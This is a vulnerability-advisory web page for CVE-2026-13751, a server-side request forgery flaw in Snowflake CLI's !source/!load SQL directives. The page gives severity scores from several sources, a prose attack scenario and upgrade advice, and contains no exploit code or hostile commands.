Skip to main content

Snowflake CLI CVE-2026-13751

| EUVDEUVD-2026-40147 CRITICAL
Inclusion of Functionality from Untrusted Control Sphere (CWE-829)
2026-06-29 412d305a-227d-44f9-a262-a31ba44f2aea GHSA-6xpv-fwh6-29jc
Critical
Disputed · 9.6 NVD
Share

Severity by source

Sources disagree (Medium–Critical)
Vendor (412d305a-227d-44f9-a262-a31ba44f2aea) PRIMARY
MEDIUM
qualitative
NVD
9.6 CRITICAL
AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
vuln.today AI
9.6 CRITICAL

Network parser with no auth gate (PR:N) but requires victim to run crafted SQL (UI:R); SSRF plus session-context SQL execution crosses scope (S:C) with high C/I, while availability impact is limited (A:L).

3.1 AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L
4.0 AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N

vuln.today treats the vendor’s rating as authoritative. A higher third-party CVSS (e.g. CISA-ADP) is shown for transparency but does not drive the headline severity.

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

7
Analysis Updated
Jun 30, 2026 - 16:28 vuln.today
v3 (cvss_changed)
Analysis Updated
Jun 30, 2026 - 16:28 vuln.today
v2 (cvss_changed)
Re-analysis Queued
Jun 30, 2026 - 16:22 vuln.today
cvss_changed
Severity Changed
Jun 30, 2026 - 16:22 NVD
MEDIUM CRITICAL
CVSS changed
Jun 30, 2026 - 16:22 NVD
4.1 (MEDIUM) 9.6 (CRITICAL)
Patch available
Jun 29, 2026 - 19:01 EUVD
Analysis Generated
Jun 29, 2026 - 17:33 vuln.today

DescriptionNVD

Improper handling of untrusted remote references in Snowflake CLI versions prior to 3.19 allowed server-side request forgery. The SQL statement reader's !source/!load directives could reference remote URLs that were retrieved at runtime without sufficient restriction on the request destination. By supplying crafted SQL content processed through a vulnerable command path, an attacker could cause the victim's environment to issue unintended outbound requests to internal or otherwise non-public network locations, and could cause remote SQL content to be retrieved and executed in the context of the victim user's session. Successful exploitation requires the victim to process attacker-controlled content through a vulnerable command path and is limited by the privileges available to that session and environment. The fix is available in Snowflake CLI version 3.19, which adds an option to disable remote URL retrieval.

AnalysisAI

Server-side request forgery in Snowflake CLI versions 3.6.0 through 3.18.x lets an attacker coerce a victim's CLI session into fetching attacker-chosen remote URLs and then retrieving and executing remote SQL in that session's context. The flaw lives in the SQL statement reader's !source/!load directives, which resolve remote references at runtime without restricting the request destination, so a victim who processes attacker-supplied SQL can be made to reach internal/non-public network locations. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Craft SQL with !source/!load remote URL
Delivery
Deliver script to victim workflow
Exploit
Victim runs script in vulnerable CLI
Execution
CLI fetches attacker/internal URL (SSRF)
Persist
Remote SQL executed in victim session
Impact
Internal access or data impact

Vulnerability AssessmentAI

Exploitation Exploitation requires the victim to process attacker-controlled SQL content through a vulnerable command path that invokes the SQL statement reader's !source or !load directives, and requires the running Snowflake CLI to be between 3.6.0 and 3.18.x with remote URL retrieval enabled (the default before 3.19.0). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Signals conflict and must be weighed rather than read off the 9.6 alone. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker delivers a SQL file (e.g., via a shared repo, support ticket, or 'helpful' setup script) containing a !source or !load directive pointing at an attacker-controlled or internal URL. When the victim runs that script through a pre-3.19 Snowflake CLI, the CLI fetches the remote content - reaching internal systems on the victim's behalf and executing the returned SQL in the victim's authenticated session. …
Remediation Upgrade to the fixed release - Vendor-released patch: Snowflake CLI version 3.19.0, which introduces an option to disable remote URL retrieval; this is the primary and recommended fix. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

24 hours: Identify and catalog all Snowflake CLI installations across development, CI/CD, and production systems; determine which are running versions 3.6.0-3.18.x. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-13751 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy